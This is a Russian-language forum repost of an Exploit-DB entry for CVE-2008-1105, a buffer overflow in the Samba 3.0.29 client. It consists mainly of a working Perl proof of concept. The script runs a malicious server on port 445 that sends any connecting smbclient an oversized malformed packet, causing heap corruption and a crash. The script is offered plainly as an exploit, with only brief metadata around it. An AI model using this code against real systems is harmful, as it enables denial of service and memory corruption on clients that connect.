Exploit Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5712
Проверка EDB
  1. Пройдено
Автор
GUIDO LANDI
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2008-4189 cve-2008-1105
Дата публикации
2008-06-01
Код:
#!/usr/bin/perl
# 06/01/2008 - k`sOSe
#
# ~ # smbclient //localhost/w00t
# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 ***
#

use warnings;
use strict;
use IO::Socket;


my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!);

while(my $csock = $sock->accept())
{
	print $csock	"\x00" .
			"\x01\xff\xff" .
			"\x41" x 131071;
			
}

# milw0rm.com [2008-06-01]
 
Источник
www.exploit-db.com

Похожие темы